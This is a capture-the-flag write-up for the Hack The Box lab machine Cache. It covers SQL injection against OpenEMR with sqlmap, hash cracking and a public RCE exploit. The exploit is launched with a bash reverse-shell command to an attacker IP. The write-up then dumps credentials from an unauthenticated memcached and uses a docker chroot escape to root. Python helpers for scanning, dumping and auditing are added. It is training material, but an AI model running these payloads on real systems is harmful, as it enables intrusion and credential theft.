24th October 2020
Hack The Box Write-Up Cache by T13nn3s

Hack The Box Write-Up Cache – 10.10.10.188

“It’s Impossible.” said Pride. “It’s Risky.” said Experience. “It’s Pointless.” said Reason. If you really are Hacker! then Give it a try!

PCbots Lab’s

About Cache

In this post I’m writing a write-up for the machine Cache from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

Cache is a ‘medium’ rated box. Submitting the user.txt flag raises your points by 15, and submitting the root flag raises them by 30.

Foothold
The initial foothold on this box took me some time. Searching through the source files of the login page, I found the login credentials, but after logging in I only ended up on a ‘page is under construction’ page. After some more searching, I checked the Author page and added hms.htb to my hosts file. Visiting http://hms.htb landed me on an OpenEMR login page, and I found that this version of OpenEMR has an authenticated remote code execution vulnerability.

User
By exploiting OpenEMR I got a reverse shell as the user www-data. From this account I switched to the user ‘ash’, who has permission to read the user.txt file.

Root
First, I downloaded LinEnum.sh to this box and ran it as part of my enumeration. It showed that Docker is running and that a service is listening on TCP 11211, which turned out to be memcached. I connected to this service, dumped its data and got the password for the user ‘luffy’. I opened an SSH session as this user and went straight to the Docker part of this box. Using the GTFOBins entry for docker, I dropped a root shell and rooted the box.

Machine Info

[Image: Cache machine info card with the IP 10.10.10.188 and the makers of the box]

Recon

Port scan

As always, I start this box with a port scan.

~$ nmap -sC -sV -oA ./nmap/cache.txt 10.10.10.188

The results.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 13:38 EDT
Nmap scan report for 10.10.10.188
Host is up (0.062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds

The results show that there are two open ports:

  1. 22/tcp (SSH)
  2. 80/tcp (HTTP)

Enumeration Web Server

cache.htb

Let’s start the enumeration with the web server. I visited http://10.10.10.188 and landed on a website that tries to explain: What is Hacking? This is ironic. I think I’m going to hack into this website. Let’s show them what hacking really means.

[Screenshot: http://10.10.10.188, the ‘What is Hacking?’ landing page]

After clicking around on the website I found a News page and a Contact Us page. I tried some common XSS and SQLi payloads in the contact form, but nothing seemed to work. The Author page shows some information about the creator of this box. I also noticed a login page and went there.

I tried some common usernames and passwords and, as expected, they did not work. I checked the source code and found some script files.

[Screenshot: source of http://10.10.10.188/login.html]

I checked every script file and found really interesting information in http://10.10.10.188/jquery/functionality.js: the login check runs entirely in the browser, so the file contains the username and password it compares the form input against. The username is ash and the password is H@v3_fun. Anyone who can read the page can read the credentials, which is why a client-side check is never authentication.

~$ curl http://10.10.10.188/jquery/functionality.js
$(function(){
    
    var error_correctPassword = false;
    var error_username = false;
    
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         checkCorrectPassword();
         error_username = false;
         checkCorrectUsername();


        if(error_correctPassword == false && error_username ==false){
            return true;
        }
        else{
            return false;
        }
    });
    
});
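The pattern in functionality.js (a form field read with jQuery’s .val() and compared to a string literal) is easy to hunt for across all the script files of a login page. The following scanner is an added example and not code from the write-up or from the box; the function names script_urls and find_client_side_secrets are mine, and the HTML and JavaScript samples are constructed (the JavaScript is a trimmed copy of the page’s functionality.js).

```python
"""Scan JavaScript for credentials that are checked client-side.

Added example; not code from the write-up or from the Cache box. It targets
the pattern seen in functionality.js: a form field read with jQuery's
.val() and compared against a string literal. SAMPLE_HTML and SAMPLE_JS are
constructed inputs.
"""
import re

# <script src="..."> references, so every script file of a login page can be collected.
SCRIPT_SRC_RE = re.compile(r"""<script[^>]+src=["']([^"']+)["']""", re.I)

# var Password = $("#password").val();  -> maps a JS variable to a form field id
FIELD_RE = re.compile(r"""var\s+(\w+)\s*=\s*\$\(\s*["']#([\w-]+)["']\s*\)\.val\(\)""")

# Password != 'literal'  /  Username !== "literal"  /  x == 'literal'
CMP_RE = re.compile(r"""\b(\w+)\s*(?:!==?|===?)\s*(["'])((?:(?!\2).)*)\2""")


def script_urls(html: str) -> list:
    """Return the src attribute of every <script> tag in the HTML."""
    return SCRIPT_SRC_RE.findall(html)


def find_client_side_secrets(js_source: str) -> dict:
    """Return {form_field_id: literal} for every form field compared to a literal."""
    var_to_field = dict(FIELD_RE.findall(js_source))
    found = {}
    for var, _quote, literal in CMP_RE.findall(js_source):
        if var in var_to_field:          # only comparisons against form input count
            found[var_to_field[var]] = literal
    return found


SAMPLE_HTML = """<form id="loginform">...</form>
<script src="jquery/jquery.min.js"></script>
<script src="jquery/functionality.js"></script>"""

SAMPLE_JS = r"""$(function(){
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
        }
    }
});"""


if __name__ == "__main__":
    print("scripts to fetch:", script_urls(SAMPLE_HTML))
    print("client-side credentials:", find_client_side_secrets(SAMPLE_JS))
```

In practice you fetch the login page, run script_urls over it, fetch each script and run find_client_side_secrets over the source; a non-empty result means the comparison value is shipped to every visitor.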

I logged in on the webpage and ended up on a page that seems to be under construction.

[Screenshot: http://10.10.10.188/net.html, ‘under construction’]

hms.htb

From this point it took me some time to find the next step. I ended up going back to the Author page, which hints at hms.htb, and adding hms.htb to my hosts file, pointing it at the IP of this box, 10.10.10.188. I visited http://hms.htb and ended up on an OpenEMR login portal.

OpenEMR is a popular open-source electronic health records and medical practice management application. Its source code is publicly available on GitHub.

[Screenshot: OpenEMR login portal at http://hms.htb]

I tried the credentials from the first site on this login form, but they did not work. The source code reveals nothing interesting. The default username admin with the default password pass did not work either. I ended up on Google searching for an exploit for OpenEMR and found one for OpenEMR version 5.0.1.

Intrusion

SQL Injection

On the page https://www.exploit-db.com/exploits/45161 I found an exploit for an (authenticated) remote code execution vulnerability in OpenEMR version 5.0.1. I did not know which version of OpenEMR was running on the box, but I could at least try this exploit.

I used searchsploit to copy the exploit to my working directory.

~$ searchsploit openEMR
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                      |  Path
                                                                                                                                                                    | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenEMR 4.1.2(7) - Multiple SQL Injections                                                                                                                          | exploits/php/webapps/35518.txt
OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting                                                                                                         | exploits/php/webapps/43232.txt
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions                                                                                                            | exploits/linux/webapps/45202.txt
OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution                                                                                                             | exploits/php/webapps/45161.py
OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities                                                                                           | exploits/php/webapps/14011.txt
Openemr-4.1.0 - SQL Injection                                                                                                                                       | exploits/php/webapps/17998.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
~$ sudo cp /usr/share/exploitdb/exploits/php/webapps/45161.py .

I read the exploit and watched the YouTube video (https://www.youtube.com/watch?v=DJSQ8Pk_7hc) with the PoC. It is an authenticated remote code execution exploit, so I first need credentials to get it to work. I followed the PoC to obtain them through SQL injection.

In my browser I requested http://hms.htb/portal/add_edit_event_user.php?eid=1' and got an SQL error message back: the unbalanced quote breaks the query, which confirms that the eid parameter is injectable. I intercepted the request with Burp Suite and saved it in the file openemr.req.
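Why a trailing apostrophe produces a database error, and why a boolean or UNION payload on the same parameter returns rows the page was never meant to show, as an added illustration that is not OpenEMR’s code: an in-memory SQLite database with two constructed tables (events and users_secure) stands in for the real schema, the users_secure row reuses the hash sqlmap dumps later in this write-up, and the function names are mine.

```python
"""Why `eid=1'` errors, and why `eid=1 OR 1=1` or a UNION leaks data.

Added example, not OpenEMR's code: the tables, rows and function names are
constructed. vulnerable_lookup pastes the request parameter into the SQL
text, as the injectable endpoint does; safe_lookup binds it as a parameter.
"""
import sqlite3

OPENEMR_ADMIN_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (eid INTEGER, title TEXT)")           # constructed
    conn.executemany("INSERT INTO events VALUES (?, ?)",
                     [(1, "Checkup"), (2, "Follow-up"), (3, "Surgery")])
    conn.execute("CREATE TABLE users_secure (username TEXT, password TEXT)")  # constructed
    conn.execute("INSERT INTO users_secure VALUES (?, ?)",
                 ("openemr_admin", OPENEMR_ADMIN_HASH))
    return conn


def vulnerable_lookup(conn, eid: str) -> list:
    """String concatenation: the attacker controls part of the SQL text."""
    sql = "SELECT eid, title FROM events WHERE eid = " + eid
    return conn.execute(sql).fetchall()


def safe_lookup(conn, eid: str) -> list:
    """Parameter binding: eid is only ever data, never SQL."""
    return conn.execute("SELECT eid, title FROM events WHERE eid = ?", (eid,)).fetchall()


def probe(conn, eid: str) -> str:
    """What a tester sees for a payload: 'error', 'data' or 'empty'."""
    try:
        rows = vulnerable_lookup(conn, eid)
    except sqlite3.Error:
        return "error"                 # the unterminated quote in 1'
    return "data" if rows else "empty"


if __name__ == "__main__":
    conn = make_db()
    for payload in ["1", "1'", "999", "1 OR 1=1",
                    "0 UNION SELECT username, password FROM users_secure"]:
        print(f"{payload!r:60} -> {probe(conn, payload)}")
    print(vulnerable_lookup(conn, "0 UNION SELECT username, password FROM users_secure"))
    print(safe_lookup(conn, "1 OR 1=1"))   # [] : the whole string is one literal value
```

The probe function is the manual version of what sqlmap automates: an error for a stray quote, different responses for true and false conditions, and a UNION that pulls rows from another table into the result set.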

[Screenshot: SQL error returned by OpenEMR 5.0.1 for eid=1']

The file openemr.req has the following contents. Note, I removed the apostrophe at the end of the URL.

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=dc79vfqtir944qcotcf9a14qrv; PHPSESSID=n130v72imsdjjg73otlb7a4m3p
Upgrade-Insecure-Requests: 1

I used sqlmap to exploit this vulnerability and dump the users_secure table, which is where OpenEMR stores its login hashes; this gave me the hash of the openemr_admin account.

~$ sqlmap -r openemr.req --threads=10 -D openemr -T users_secure --dump
...
[15:44:11] [INFO] retrieved: ' '
[15:44:11] [INFO] retrieved: 'openemr_admin'
Database: openemr
Table: users_secure
[1 entry]
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+

[15:44:11] [INFO] table 'openemr.users_secure' dumped to CSV file '/home/kali/.sqlmap/output/hms.htb/dump/openemr/users_secure.csv'
[15:44:11] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/hms.htb'

I placed the password hash in the file openemr_admin_hash.txt and handed it to john; the password was cracked almost instantly. Note the $2a$05$ prefix: this is bcrypt with a cost factor of 5, i.e. only 32 rounds (john reports this as iteration count 32), far below the cost of 10 or more that is normal today, which is why a wordlist run finishes in a fraction of a second.

~$ john openemr_admin_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
xxxxxx           (?)
1g 0:00:00:00 DONE 2/3 (2020-05-18 15:48) 2.222g/s 2520p/s 2520c/s 2520C/s water..zombie
Use the "--show" option to display all of the cracked passwords reliably
Session completed

(Authenticated) Remote Code Execution

Now that I have the password I can authenticate to OpenEMR and use this vulnerability to gain access. The -c payload is a bash reverse shell back to my machine on 10.10.14.48:4444, so a listener (for example nc -lvnp 4444) has to be running before the exploit is launched.

~$ python 45161.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.48/4444 0>&1'
 .---.  ,---.  ,---.  .-. .-.,---.          ,---.    
/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\   
| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/   
| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (    
\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \   
 )---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\  
(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__) 
                                                       
   ={   P R O J E C T    I N S E C U R I T Y   }=    
                                                       
         Twitter : @Insecurity                       
         Site    : insecurity.sh                     

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload

www-data / ash

I got a reverse shell as the user www-data. Let’s upgrade it to a fully interactive shell. I checked the user accounts on this box and found two users, ash and luffy. The user.txt file is in the home folder of ash, but www-data does not have permission to read it.

$ whoami
www-data
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ cd /home
/home$ ls
ash  luffy

I already have the password of ash, so let’s switch to this user and try to read the file.

/home$ su - ash
Password: H@v3_fun
$ cd /home/ash
/home/ash$ cat user.txt
18d7de65f788084b8ae999bb67f4b858

I now have user on this box; the next step is privilege escalation.

Privilege Escalation

Enumeration

I first downloaded LinEnum.sh, my favourite enumeration script for Linux, to the box and ran it.

ash@cache:~$ bash LinEnum.sh
...
[-] Listening TCP:                                                                                                                                                                                           
Active Internet connections (only servers)                                                                                                                                                                   
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name                                                                                                             
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                                                                                                                            
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                                                                                                                            
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                                                                                                                            
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                                                                                                                            
tcp6       0      0 :::22                   :::*                    LISTEN      -                                                                                                                            
tcp6       0      0 :::80                   :::*                    LISTEN      - 

I noticed the server listening on 127.0.0.1:11211, a port I did not recognise. A quick search showed that memcached listens on TCP 11211 by default, so I checked whether that service is running on this box.

ash@cache:~$ systemctl status memcached.service
● memcached.service - memcached daemon
   Loaded: loaded (/lib/systemd/system/memcached.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2020-05-20 18:59:06 UTC; 3min 12s ago
     Docs: man:memcached(1)
 Main PID: 920 (memcached)
    Tasks: 10 (limit: 4660)
   CGroup: /system.slice/memcached.service
           └─920 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -…id

Warning: Journal has been rotated since unit was started. Log output is incomplete or unavailable.

Memcache

Aha, memcached is running. It is bound to 127.0.0.1 only, but it has no authentication at all, so any local user can talk to it. I connected to the service and dumped its data.

ash@cache:~$ telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
?
ERROR
help
ERROR
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 51
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 100
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 1690
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END

The output shows a single slab class (items:1) holding five items. The key names in a slab can be listed with stats cachedump 1 100; the interesting one is passwd, and get returns its value.

get passwd
VALUE passwd 0 9
0n3_p1ec3
END
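The full sequence for dumping a memcached instance whose key names you do not know in advance (stats items, then stats cachedump for each slab, then get for each key), as an added example that is not part of the write-up. The class and function names (MemcachedDumper, socket_transport, FakeMemcached) are mine; the client takes a send(cmd) callable, so the same code runs against a live socket or, as here for an offline demonstration, against a fake whose data is constructed and modelled on the passwd key above.

```python
"""Dump a memcached instance over its plain-text protocol.

Added example, not from the write-up. Flow: `stats items` lists slab
classes, `stats cachedump <slab> <limit>` lists the keys in a slab, `get
<key>` fetches each value (length-delimited, so binary-safe). FakeMemcached
and SAMPLE_STORE are constructed stand-ins for the box's daemon.
"""
import re
import socket


def reply_complete(buf: bytes) -> bool:
    """A reply is complete at END, or at a one-line ERROR/CLIENT_ERROR/SERVER_ERROR."""
    if buf.endswith(b"END\r\n"):
        return True
    first = buf.split(b"\r\n", 1)[0]
    return buf.endswith(b"\r\n") and first.split(b" ")[0] in (
        b"ERROR", b"CLIENT_ERROR", b"SERVER_ERROR")


def socket_transport(host="127.0.0.1", port=11211, timeout=5.0):
    """send(cmd) -> bytes against a live daemon; one connection per command."""
    def send(cmd: str) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(cmd.encode() + b"\r\n")
            buf = b""
            while not reply_complete(buf):
                chunk = s.recv(65536)
                if not chunk:
                    break
                buf += chunk
            return buf
    return send


class MemcachedDumper:
    def __init__(self, send):
        self.send = send

    def slabs(self) -> list:
        out = self.send("stats items").decode(errors="replace")
        return sorted({int(n) for n in re.findall(r"^STAT items:(\d+):", out, re.M)})

    def keys(self, slab: int, limit: int = 0) -> list:
        # limit 0 = everything the server will list (cachedump caps its output at ~2 MB)
        out = self.send(f"stats cachedump {slab} {limit}").decode(errors="replace")
        return re.findall(r"^ITEM (\S+) \[", out, re.M)

    def get(self, key: str):
        raw = self.send(f"get {key}")
        header, _, rest = raw.partition(b"\r\n")
        if not header.startswith(b"VALUE "):
            return None                      # missing key -> bare END
        length = int(header.split()[3])      # VALUE <key> <flags> <bytes>
        return rest[:length]

    def dump(self) -> dict:
        return {k: self.get(k) for slab in self.slabs() for k in self.keys(slab)}


class FakeMemcached:
    """Constructed stand-in for the box's memcached; speaks just enough protocol."""
    def __init__(self, store: dict):
        self.store = store

    def __call__(self, cmd: str) -> bytes:
        p = cmd.split()
        if p[:2] == ["stats", "items"]:
            return (f"STAT items:1:number {len(self.store)}\r\n"
                    "STAT items:1:age 51\r\nEND\r\n").encode()
        if p[:2] == ["stats", "cachedump"]:
            keys = list(self.store) if int(p[2]) == 1 else []
            keys = keys[:int(p[3])] if int(p[3]) else keys
            body = "".join(f"ITEM {k} [{len(self.store[k])} b; 0 s]\r\n" for k in keys)
            return (body + "END\r\n").encode()
        if p[:1] == ["get"] and len(p) == 2:
            v = self.store.get(p[1])
            if v is None:
                return b"END\r\n"
            return b"VALUE %s 0 %d\r\n%s\r\nEND\r\n" % (p[1].encode(), len(v), v)
        return b"ERROR\r\n"


SAMPLE_STORE = {"passwd": b"0n3_p1ec3", "user": b"luffy"}   # constructed sample data

if __name__ == "__main__":
    dumper = MemcachedDumper(FakeMemcached(SAMPLE_STORE))
    # against the box: dumper = MemcachedDumper(socket_transport("127.0.0.1", 11211))
    for key, value in dumper.dump().items():
        print(f"{key} = {value!r}")
```

Two caveats for live use: stats cachedump is a debugging command that newer memcached releases may limit or replace with lru_crawler metadump all, and binding the daemon to 127.0.0.1 does nothing against a local low-privileged user, which is the real lesson here: an unauthenticated cache is no place for credentials.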

The second user on this box is luffy, and this password works for that account.

Docker

I was still working through a reverse shell. Since this user can log in over SSH, I opened an SSH session, which makes life much easier.

~$ ssh luffy@10.10.10.188
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
luffy@10.10.10.188's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-99-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed May 20 19:12:35 UTC 2020

  System load:  0.0               Processes:              177
  Usage of /:   73.7% of 8.06GB   Users logged in:        0
  Memory usage: 11%               IP address for ens160:  10.10.10.188
  Swap usage:   0%                IP address for docker0: 172.17.0.1

 * Ubuntu 20.04 LTS is out, raising the bar on performance, security,
   and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as
   AWS, Azure and Google Cloud.

     https://ubuntu.com/blog/ubuntu-20-04-lts-arrives


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

107 packages can be updated.
0 updates are security updates.


Last login: Wed May  6 08:54:44 2020 from 10.10.14.3
luffy@cache:~$

The user luffy does not have permission to read the root.txt flag, so one more step is needed. During the enumeration for root, LinEnum.sh had already shown that Docker is running on this box, and luffy can talk to the Docker daemon:

luffy@cache:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        8 months ago        64.2MB

After a short search on Google I found this GTFOBins entry, https://gtfobins.github.io/gtfobins/docker/, on how to drop a root shell. The container mounts the host’s root filesystem at /mnt and chroots into it, so the shell runs as root on the host: anyone who can run docker (typically every member of the docker group) is effectively root.

luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
# whoami
root
# cat /root/root.txt
093640d35cee3ae2dd54bf468797bf30
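The two conditions behind this escalation are worth auditing on any host that runs Docker: who can reach the daemon (docker group membership, or a writable daemon socket) and which containers bind the host root or other sensitive paths or run privileged. The audit below is an added example and is not code from the write-up or from GTFOBins; the function names are mine, and the /etc/group text and docker inspect JSON are constructed samples shaped like the real data.

```python
"""Audit the conditions behind a docker-group root shell.

Added example; not from the write-up or GTFOBins. SAMPLE_GROUP and
SAMPLE_INSPECT are constructed inputs shaped like /etc/group and the
output of `docker inspect`.
"""
import json
import os
import stat

SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/dev", "/var/run/docker.sock")


def docker_group_members(etc_group_text: str) -> list:
    """Members of the docker group; each can run `docker run -v /:/mnt` and chroot to root."""
    for line in etc_group_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []


def socket_is_world_writable(path: str = "/var/run/docker.sock") -> bool:
    """True when the daemon socket is writable by everyone (same impact as docker group)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & stat.S_IWOTH)


def is_sensitive_host_path(src: str) -> bool:
    return src in SENSITIVE_HOST_PATHS or any(
        src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def risky_containers(inspect_json: str) -> list:
    """(container name, finding) pairs from `docker inspect` JSON (a list of containers)."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "").lstrip("/")
        hc = c.get("HostConfig", {})
        for bind in hc.get("Binds") or []:
            src = bind.split(":")[0]          # host path is the first component
            if is_sensitive_host_path(src):
                findings.append((name, f"host bind {bind}"))
        if hc.get("Privileged"):
            findings.append((name, "privileged"))
        if hc.get("PidMode") == "host":
            findings.append((name, "pid=host"))
    return findings


SAMPLE_GROUP = "root:x:0:\nsudo:x:27:ash\ndocker:x:999:luffy\n"      # constructed

SAMPLE_INSPECT = json.dumps([                                       # constructed
    {"Name": "/escape", "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False, "PidMode": ""}},
    {"Name": "/app", "HostConfig": {"Binds": ["/srv/app/data:/data:ro"], "Privileged": False, "PidMode": ""}},
    {"Name": "/agent", "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                                      "Privileged": True, "PidMode": "host"}},
])

if __name__ == "__main__":
    print("docker group:", docker_group_members(SAMPLE_GROUP))
    print("socket world-writable:", socket_is_world_writable())
    for name, finding in risky_containers(SAMPLE_INSPECT):
        print(f"{name}: {finding}")
```

On a real host feed docker_group_members the contents of /etc/group and risky_containers the output of docker inspect over the running container IDs. The fix for the first finding is not a docker flag: keep the docker group empty (or use rootless Docker), because membership is equivalent to root.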

I got the shell and, more importantly, root privileges. Did you like this write-up? Please consider giving a respect point on my HTB profile: https://www.hackthebox.eu/home/users/profile/224856.

Happy Hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.
